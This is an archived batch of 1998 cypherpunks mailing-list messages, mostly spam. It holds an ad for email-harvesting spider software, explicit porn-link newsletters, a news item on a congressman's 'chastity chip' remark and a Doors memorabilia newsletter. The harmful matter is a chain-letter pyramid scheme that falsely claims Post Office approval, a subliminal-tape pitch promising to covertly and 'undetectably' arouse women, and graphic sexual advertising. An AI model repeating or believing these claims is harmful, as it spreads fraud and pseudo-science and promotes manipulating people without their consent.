Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <ajhh4@worldnet.att.net>
Subject:  Friday
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 6 Feb 1998 01:39:29 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Feb 6 '98
Message-ID: <19980206082121.11843.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

PLAYGAL
This is truly a breathtaking site. Well-designed and easy to
use with  excellent content.  The tour alone has hotter porn
than many other 'free' sites - go see it now. It's explicit,
comprehensive and top quality.  There are 2,000  video feeds
online, free live fucking with sound, 10,000 erotic stories,
1,000s of top quality pix, adult and arcade games, real ama-
teur competitions and much more. Click now and be astounded!
Playgal --> http://www.playgal.com/playgal/banner_email.html

Ultra Hardcore -FREE XXX Samples - We push the limit of legal pictures!
http://www.ultrahardcore.com/ultracash/ultracash.cgi?eureka2
Get FREE XXX Samples from *ultrahardcore.com*.  We have
exclusive Max Hardcore pictures - that's right - Fisting,
Spread Assholes, Cum Shots and more.  *NEW* Get live fucking
with Sound!  Even get to see live bizarre stuff like live
PISSING shows! We have it all!!!!

NYCBBS ADULT EMPORIUM'S
Over 200 free pix all clearly listed with text descriptions!
Such as, w ould you let a chubby amateur suck your cock,  or
you can ride me tonight! You name it, it's in here. You will
be glad you stopped by.  Don't miss this one.  Cruise on by!  
Nycbbs Adult .......... http://www.nycbbs.com/adult/picpost/

69 FREE PICS
No I did not count them,  but the number sounds good.  There 
are some pictures from a  strip show showing some really hot
babes with whipped cream all  over their boobs.  Super tight
bodies with  neatly trimmed pussies.  Have a beer  and maybe
you will feel  like your over at a  hot Canadian strip club?  
69 Free Pics .................... http://www.69freepics.com/

ANAL DESIRES
This is a paysite.  They do give  you a few free pictures to
entice you to join in  the fun.  Up the butt with one or two
cocks is the  flavor here!  Major  butt action!  You have to
see this one image of this pussy.  Major labia in a big way!
Anal Desires .................... http://web.wa.net/~plunge/

GALAXSHE
Cool website  featuring five  free galleries of  hot looking
ladies.  There is great tits,  long legs and high heels, all
spread wide.  Just the way we like it!  The images load fast
and are all thumbnailed for quick access. Take a look at it!
Galaxshe .......................... http://www.galaxshe.com/

#READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
#$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A
#
HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Bizarre ----------------------> http://204.244.215.7/teens2/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Katie: A alluring blonde with a penchant for dildos, this young gal is
seductive! Bold and petite, this sexy little girl knows what men &
women want. She loves to please, and to be pleased. This gal is the
kind of girl Bill Clinton would want to have as an intern! Visit her
now and get off!

---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Very Sexy Erotic Stories: Ready  for  lots  of hot, free sex
stories? Look no further than  Very Sexy Erotic Stories. All
different subjects, all free. ..... http://www.verysexy.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?060
Pic  2 --------------------------> http://137.39.63.229/?061
Pic  3 --------------------------> http://137.39.63.229/?062
Pic  4 --------------------------> http://137.39.63.229/?063
Pic  5 --------------------------> http://137.39.63.229/?064
Pic  6 --------------------------> http://137.39.63.229/?065
Pic  7 --------------------------> http://137.39.63.229/?066
Pic  8 --------------------------> http://137.39.63.229/?067
Pic  9 --------------------------> http://137.39.63.229/?068
Pic 10 --------------------------> http://137.39.63.229/?069

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 6 Feb 1998 10:39:13 -0800 (PST)
To: usual suspects:
Subject: "The Internet needs a chastity chip." ---James Traficant, Dem-Ohio
Message-ID: <3.0.5.32.19980206104015.00794d50@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




http://www.yahoo.com/headlines/980206/wired/stories/cybersex_1.html



Friday February 6 10:07 AM EST 

Lawmaker warns of cybersex "pregnancy danger"

WASHINGTON (Reuters) - Citing the case of a woman who claims she got
pregnant from e-mail, an Ohio Democrat called Wednesday for a "chastity
chip" for the Internet. 

Rep. James Traficant, known for his flamboyant rhetoric, gave a brief floor
speech about a woman named Frances who claimed to have gotten pregnant
through an e-mail exchange with a paramour 1,500 miles away. 

"That's right -- pregnant," the Congressman proclaimed, warning of the
dangers of "immaculate reception." 

He called on Congress to go beyond "v-chips" that would protect kids from
sexual content on the Internet, saying: "Its time for Congress to act. The
computers do not need a v-chip. The Internet needs a chastity chip." 

Although Traficant did not say whether he believed the woman's account, he
did say it was "enough to crash your hard drive." 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doorlist@doors.com
Date: Fri, 6 Feb 1998 16:12:27 -0800 (PST)
To: doorlist@doors.com
Subject: RE: The Doors: Strange Days #3
Message-ID: <199802070010.RAA03551@quasar.fiber.net>
MIME-Version: 1.0
Content-Type: text/plain



    WELCOME  to The Doors Collectors Magazines
             Strange Days News Emailer  Vol. 3
 
              The Celebration Has Just Begun!

 
STRANGE DAYS  MEMORABILIA  NEWS  ITEMS:

   Congratulations to the five Doors Autographed Box Set winners! These Doors box sets were signed by Ray, John, and Robby on the front cover of the inside book and were given away to random people from our Strange Days Email List.  The winners were: Jim Kearns (Camillus, NY),  Ainslee Rogers (Hamilton, Canada),  Suzie Williams (Harrogate, TN), and Barry Abbott (Ermington, Austrailia), and Laura Pritchett (Missoula, MT).  This contest added over 1,000 people to our email list, so watch out for promotions similar to this in the future!

   The Doors Tour Equipment from our last emailer is still available. One envious person on the net is saying that these items aren't authentic... Vince Treanor (The Doors Road Manager) wanted me to pass along the message that he would be happy to talk to any prospective buyers who believe this bullshit. Call me to set up a three way call to Vince. Prospective buyers only please!

   Recently lots of new memorabilia items have turned up due to the release of the box set.  The rest of this issue of the Strange Days News Emailer is dedicated solely to new items that are both "Wanted" and are "For Sale".  If you aren't into collecting Doors memorabilia, you still might want to read on; I've tried to put a little news into each entry.  Enjoy!  For more info about how to order, please go to:
http://www.doors.com/door_mem/


STRANGE  DAYS  MEMORABILIA  ITEMS  FOR  SALE:

*** The Doors Albums on Postage Stamps!  
   Late last month the island of St. Vincent issued a set of six stamps which commemorated the 30th anniversary of The Doors first LP.  Never before has any country issued such a complete set of stamps to honor an artists complete catalogue of studio material before! Each stamp for each Doors album! The Doors Collectors Magazine has a number of these stamp sets available right now for $10 per sheet (eight stamps per sheet.)  While supplies last we will also give you a FREE collector portfolio ($20 value) to keep your stamps in if you buy the complete set of six stamps at the same time ($60 + $4.50 s&h). 
For more information, please see:
http://www.doors.com/door_mem/other/sv_stamp.html

*** Autographed Box Sets 
   (w/ Ray, John, and Robby's sigs) We have a few of them available for sale at $175 plus postage. Please email first because our supply won't last long!

*** "A New Epitaph For Pere-Lachaise" Poster
   with poem by Jan Eloise Morris. This 24x36 poster is in its fourth year of world-wide distribution. The photograph was taken in 1968 by Doors photographer, Paul Ferrara. Jim was captured in a rare moment with sunlight falling on his shoulders in front of the Observatory in Griffith Park in Los Angeles, California. The poster's publication in 1994 marked the only time another artist's poetry has been authorized to appear with Morrison's image. Jan's association with The Doors Collectors Magazine affords us the exclusive opportunity to offer signed, dated copies only through this web site. Price: $20 includes shipping U.S. (please add $5 for delivery outside of the U.S.)
For more information, please see:
http://www.doors.com/door_mem/posters/epitaph.html

*** "My Eyes Have Seen You"
   The most visually important book on The Doors that was ever published is now available through The Doors Collectors Magazine!  This limited edition book (of 1,500 copies) was put together by Jerry Prochnicky (author, Break On Through) and Joe Russo (lead singer, The Soft Parade). 150 pages of both color and B&W photos. Highly recommended!   Price: $20 (plus $4.50 s&h)
For more information, please see:
http://www.doors.com/door_mem/books/myeyes.html

*** Autographed 5" x 7" B&W Promotional Photo 
   of The Doors signed by all four Doors:  Given away to members of The Doors official fan club back in 1968. Very rare! Framed. Excellent condition.  While some of these photos have been suspect to not being all they're cracked up to be, this one comes with Doors Collectors Magazine Guarantee & Certificate of Authenticity. Price: $2,500 (plus $4.50 s&h)

*** Original "Jim Morrison Film Festival" / HWY Poster 
   Even if you don't want (or can't afford) this poster, you have to check it out! It is the most incredible original Jim Morrison poster ever made ...and one of the rarest!  This poster was folded  as it was stored so it does have damage, but looks great framed even still.  Price: $2,200  (plus $4.50 s&h)
For more information, please see:
http://www.doors.com/door_mem/posters/hwyposter.html

*** An American Prayer Acetate.  
   We have a private collection that we are offering for sale which includes test pressings of An American Prayer LP.  These copies came from someone who was directly responsible for many production decisions on the An American Prayer LP release. Acetates are temporary albums good for playing only a few times that are necessary to check how the sound will be when the tape gets pressed onto the actual vinyl.  There are probably only these copies for the entire An American Prayer release in existence! Both have their original Capital Records Mastering Jackets and are individually are described below:

   Copy #1: dated 9-20-78 Exc. Condition. One double sided album that contains all songs.  Price $500 (plus $4.50 s&h)

  Copy #2: dated 10-13-78 Exc. Condition. A pair of two single sided albums that are missing two songs on each side.  Price: $650 (plus $4.50 s&h)

   For a complete listing of ALL OTHER items from this same private collection, check out:
http://www.doors.com/door_mem/museum/private_collection.html

*** The Church of The Doors' Deadly Doorknell  
   If you're a hard core Doors fan you'll remember former Church of The Doors High Mojomuck, Anthony Spurlock when he made headlines in 1992 inside Newsweek magazine.  He also made news again when he single handedly thwarted off a public attack from radio station evangelist, Bob Larson. Sadly after this the church closed it's doors forever. 
   For years I've been trying to get permission to reprint these. Finally I've done it!  You can now obtain quality reprints direct from the masters of their best (and last) two issues (Spring 1992 & Winter 1992-93) for the same $5 each (plus postage) that they originally cost. For more information on The Church, check out the new article on our website's On-Line Magazine written back in 1993 for our first printed magazine by their High Mojomuck, Anthony Spurlock located at:
http://www.doors.com/magazine/

To read more about the actual Church of the Doors fanzines (The Deadly Doorknell) go to: http://www.doors.com/door_mem/fanzines

*** Oakley Krieger Band performing LIVE w/ Robby Krieger
   at the Whisky-A-Go-Go in Los Angeles (3-15-97) It's their complete performance on video...and what a great performance!   The OK Band features Robby Krieger's son Waylon on guitars and Berry Oakley's son, Berry Oakley Jr. on vocals.  Videotaped and produced by the OK Band, this electrifying performance is now available on video tapes that are autographed on their label by both Waylon and Berry!
Price: $25 (plus $4.50 s&h) 
Autographed copies available at no extra charge only while supplies last!
For more information, please go to:
http://www.doors.com/door_mem/videos/OKBand.html

*** FREE LIVE SHOW TAPE*** 
   During the months of February & March if you mention this ad, we will give one FREE 90 minute cassette volume from our trade list with every $100 spent on Doors MEMORABILIA from our list at:
http://www.doors.com/door_mem/
Or you can check out our list of LIVESHOW audio cassette tapes for trade at:
http://www.doors.com/liveshow/

*** ATTENTION  EUROPEAN  DOORS  FANS***
    We now have capabilities to dub our trade videos directly in PAL at no additional trade value.

*** Original hard cover copies of Wild Child by Linda Ashcroft were pulled from the shelves in the UK when it's controversial writings were challenged in court.  Linda informed The Doors Collectors Magazine that her publisher will be re-issuing an edited book in paperback form sometime in mid-June. If any of you have *hardcover copies* for sale, please email me!



*** MEMORABILIA  ITEMS  WANTED:

If you have any of these items and are interested in selling them at a reasonable price or if you have an item that you're looking for and would like to have it included on our next "Want List", please call or email me your price or price range!  I have tentative buyers for all of the following items.  

	BOOKS  WANTED
 "Riders On The Storm" Audio Book
"Jim Morrison & The Doors" book by Mike Jahn
"The American Night" Hard Cover (only) book by Jim Morrison
"Wild Child" hard cover book by Linda Ashcroft
All privately published editions of all three of Morrison's poetry books

	LPS  WANTED  (Exc condition or better only)
Doors: "13" LP
Doors: "Absolutely Live" LP
Doors: "Full Circle" LP
Doors: "Other Voices" LP
Doors: "Strange Days" LP (mono issue only)
Doors: "The Doors" LP (mono issue only)
Doors: "Waiting For The Sun" LP (mono issue only)
Doors: "Weird Scenes Inside The Goldmine" LP
Doors: "LA Woman" LP (original issue only)
Doors: "'The Doors' movie soundtrack" LP
Ray Manzarek's "Carmina Burana" LP
Ray Manzarek's "Nite City Golden Days Diamond Nights" LP
Ray Manzarek's "Nite City" LP
"Comfortable Chair" LP
"Phantoms Divine Comedy" LP
"Phantoms Lost Album" LP
Any PROMO issued LPs for The Doors or the solo members

	OTHER DOORS ITEMS WANTED:
1968 Doors Tour Book
All Doors Bootleg LPs and CDs
Doors RIAA Gold & Platinum Awards
"Tribute to Jim Morrison" Video
"Dance On Fire" Video
Doors Tickets or Ticket Stubs (esp. Miami '69)
All Doors 45s that have Picture Sleeves (both foreign & domestic)
Any Doors 8-Track Tapes (exc cond. only)

	OTHER NON-DOORS ITEMS WANTED:
Milkwood: "How's The Weather" LP
3-D Stereo Cameras or Projectors
3-D Stereo Cards or Slides
Collectable Cameras


	THIS IS THE END MY FRIEND... TILL NEXT TIME!

Kerry  (kerry@doors.com)
The Doors Collectors Magazine
c/o TDM Inc
PO Box 1441
Orem, UT  84059
















***********
Thanks you for reading The Doors Collectors Magazine's Strange Days Email Newsletter. It is sent ONLY to subscribers. If you were subscribed by someone other than yourself and wish to be removed from our list please
1) accept our apologies and
2)  return this message back to doorlist@doors.com with "REMOVE" in the subject line or go to
     http://www.doors.com/cgi-bin/email_list.cgi  
     and  unsubscribe.
***********





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 1gI93TS23@juno.com
Date: Sat, 7 Feb 1998 13:43:57 -0800 (PST)
To: customer@juno.com
Subject: Subliminally Seduce Women Instantly
Message-ID: <6ORJuc63p6U>
MIME-Version: 1.0
Content-Type: text/plain




Win over any woman you want in less than an hour. 

GUARANTEED!

Start dating women that until now were 'out of your league'

GUARANTEED!

I know it sounds too good to be true, but it is now  possible for you to
achieve in minutes, what typically takes most men days, months, and
sometimes even years to accomplish...SEDUCING A WOMAN!

Skeptical?

Read this. Then visit our web site to learn the FACTS!

Scientists worldwide agree that, in certain applications, subliminal mind control can accomplish amazing things. You might have heard how in the 1950s subliminal advertising was used in movie theaters to induce an unnatural craving for popcorn and an unquenchable desire for Coke.

There are many types of subliminal thought control.  Certain subliminal
influence techniques work AMAZINGLY well, while others hardly work at all!

If you don't think modern subliminal technology can change your life, THINK AGAIN! For less than the cost of a single good meal you can instantly and permanently change the way women treat you. GUARANTEED!

And the best part is that (due to a legal loophole) this is perfectly legal!

If your luck with women has been anything other than GREAT, find out the FACTS by visiting our web site.

Once you have received and tested one of our audio tapes you will be AMAZED!

Don't make the mistake of confusing the antiquated technology used in the past with newly developed digital mastering techniques. We have spent years developing computer enhanced techniques that enable us to produce mood altering products that work on any woman, anywhere, anytime...

GUARANTEED!

You cannot turn women into mindless sex slaves with this or any other
technology. You can, however, induce at will, natural urges that would otherwise lie dormant. It is simply a fact that any natural human desire such as sleep, hunger or sexual impulses can be GREATLY INTENSIFIED by using subliminal commands.

When you play these recordings in the presence of any female who has a normal sexual appetite, look out!  She won't know what has come over her! It is completely undetectable!

Even women you barely know, when subjected to this invisible aphrodisiac will find you more interesting and better looking. They will find themselves mysteriously drawn and sexually attracted to you. GUARANTEED!!

Each of our musical recordings comes with a second 'demo' tape (free of charge) that has the subliminal messages brought forward for you to hear loud and clear. Don't let your girlfriend hear this one!

WARNING: We have given you the opportunity to be more
successful with any woman you choose. If you do not at least check out the facts for yourself, you will only be cheating yourself out of
happiness and romance.

To find out more about these AMAZING tapes at our web site at:

http://www.ivpco.com/~speccass/index.html

or, if your mail reader supports hyper-links,
CLICK HERE

If our main web site is busy, try our new mirror site:

http://www.emptyshell.com

MIRROR


**********************************************************************
This message was sent by Overseas Internet Promotions, Inc. of Miami.  If you have a product or service you want to market on the Internet, call us today @ 305-668-7502
**********************************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foupe%compuserve.com@oscsystems.com
Date: Sat, 7 Feb 1998 02:12:50 -0800 (PST)
To: foupe@compuserve.com
Subject: Young Hot Girls New Site
Message-ID: <199802074293XAA44563@post.99.231.3>
MIME-Version: 1.0
Content-Type: text/plain


>>Young Hot Girls New Site

Can you handle 2 young, hot, sexy girls? Cum watch us at:
http://www.livewhorehouse.com

Where you can complete our menage-a-trois.
We really hate it when you don't cum.


Luv
Nadia and Alexa
XOXOXOXOXOXO




======================================
WE HONOR ALL REMOVE REQUESTS!! JUST MAIL YOUR REQUESTS TO:
jackpotx@ix.netcom.com
======================================
2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 7 Feb 1998 02:46:05 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Feb 7 '98
Message-ID: <19980207083702.2795.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

ULTIMATE HARDCORE
If you're  looking for  over 200  live  strip  shows and sex
crazed  video feeds  - 24 hours  a day!  -  thousands of XXX
photos - hundreds of Videos (Avis, Movs and Mpegs) - and all
totally free for a trial period,  then look no further.  The
only place you need to visit is Ultimate Hardcore. TRY FREE!
.. http://www.mr-cash.com/cgi-bin/ult-program.cgi/raw_3171/A

Tunnel Hotel pics and chat
http://www.tunnel.com
Have you ever wished for a site that doesn't run you in
circles with more ads than content, blind links, or pop up
consoles?  A site that doesn't force you to jump hoops to
get access.  We have no AVS, blind links, or consoles.  We
have 11,000 completly FREE pictures gathered from the news
groups and categorized for your easy viewing.  We have free
XXX multi roomed chat.  DON'T MISS THIS CHANCE!

BIG SEX TOYS
Sometimes  when surfing  for porn  you have  to get a little
scared,  just for fun.  Like when you call  your friend over 
and say out loud, no fucking way, look at that!  This is one
of those. Click on the free area, then Star's pics, then see
the two candle dildo image. She has enough hair on her legs,
thighs and bush to make a fucking sweater!  You have to see!
Big Sex Toys .................... http://www.bigsextoys.com/

READ OTHER PEOPLES DIRTY EMAIL
This  is a graphically  busy site with wierd colors.  Let me 
guide you to the carrot.  It's wierd shit day here! Click on
enter, then the grey enter button, then click Ambers button,
then to the bottom click the nice erect nipple, then at last
click on the fourth green radioactive barrel for a wild jpeg
of a red haired  pussy with a carrot shoved in!  I guess the
little bunny  is a vegetable lover  and wants a  carrot bad!  
Read Other Peoples .............. http://pp256.com/email.htm

AUSSIE SHOWGIRLS
Well good  day mate!  After the  warning page  click the try
before you buy.  Here you will find a  sexy mix of images to
check out.  Pussy,  blondes, anal,  and nice tits and asses!
Aussie Showgirls .............. http://www.showgirls.com.au/

ADULT MEGAPLEXXX
There are tons of daily picture links here.  As you click on
them you are  given a free picture  then another link,  that
will lead you to more free pix.  Try the daily pic from free
xxx pics,  then the all free pics, then the amateur gallery.
There you will find the gallery with lots of hot sex images!
Adult Megaplexxx ............. http://www.darkside.inter.net

#READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
#$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A
#
HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Anal --------------------------> http://204.244.215.7/anal2/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Tina: A 23-year-old  female  swinger/exhibitionist who loves
posing for erotic photos, is into  hot phone sex and meeting
for casual discreet encounters.  Tina  stands  5 ft 2 inches
tall and weighs 105 lbs. This babe is a wet dream waiting to
happen.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
TabooStories.com: Nasty  alert!  TabooStories.com  gives you
the hardest, nastiest sex stories  on  the net, all free! We
have the stories that the  other  sites  don't dare to post!
Don't say we dindn't warn you.. http://www.taboostories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?070
Pic  2 --------------------------> http://137.39.63.229/?071
Pic  3 --------------------------> http://137.39.63.229/?072
Pic  4 --------------------------> http://137.39.63.229/?073
Pic  5 --------------------------> http://137.39.63.229/?074
Pic  6 --------------------------> http://137.39.63.229/?075
Pic  7 --------------------------> http://137.39.63.229/?076
Pic  8 --------------------------> http://137.39.63.229/?077
Pic  9 --------------------------> http://137.39.63.229/?078
Pic 10 --------------------------> http://137.39.63.229/?079

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ASCOM@hx3em6.net
Date: Sat, 7 Feb 1998 10:48:28 -0800 (PST)
To: ASCOM@juno.com
Subject: Make $50,000+ through the mail for FREE!
Message-ID: <68354425_85875416>
MIME-Version: 1.0
Content-Type: text/plain



Subject: GET LEGAL CASH IN MAIL W/ ONLY $5.00

READ THIS YOU WON'T BE SORRY, I WASN'T    
   
This will be the quickest way to get cash in the mail.If you follow these
instructions carefully, you will be able to receive within two months
nearly $50,000.00.  The great part is is that $5.00 isn't really a whole
lot and it could just be worth a try.  I am currently 6 months pregnant and
my husband and I are in debt.  We both have really good professions but he
has massive student loans and credit card bills (I was lucky and my father
helped me through college).  Needless to say, since we are married to one      
another I acquired his debt also.  In any case, I followed these easy steps
thinking that I really had nothing to lose and guess what? The first week I    
started getting money in the mail! I was shocked! I still figured it would
end soon. The money just kept coming in. In my first week, I made about        
$20.00 to $30.00 dollars. By the end of the second week I had made a total
of over $1,000.00!!!!!! In the third             
week I had over $10,000.00 and it's still growing. This is now my fourth
week and I have made a total of just over $42,000.00 and it's still coming     
in .......

You send $1.00 to each of the 5 names and address stated in the
article. You then place your own name and address in the bottom of the
list at #5, and post the article in at least 200 newsgroups. (There
are thousands) and that is all.  

Let me tell you how this works and most importantly, Why  
it works....also, make sure you print a copy of this article NOW, so    
you can get the information off of it as you need it. The process is    
very simple and consists of 3 easy steps: 

Like most of us, I was a little skeptical and   
a little worried about the legal aspects of it all. So I checked it  
out with the U.S. Post Office (1-800-725-2161) and they confirmed 
that it is indeed legal! 

Seriously, your story will sound like this one if you participate by doing
the following:  

STEP 1: Get 5 separate pieces of paper and write your address on each
piece of paper along with "PLEASE PUT ME ON YOUR MAILING LIST."
 Now get 5 $1.00 bills and place ONE inside EACH of the 5 pieces of paper so th
e bill will  
not be seen through the envelope to prevent thievery. Next, place one paper
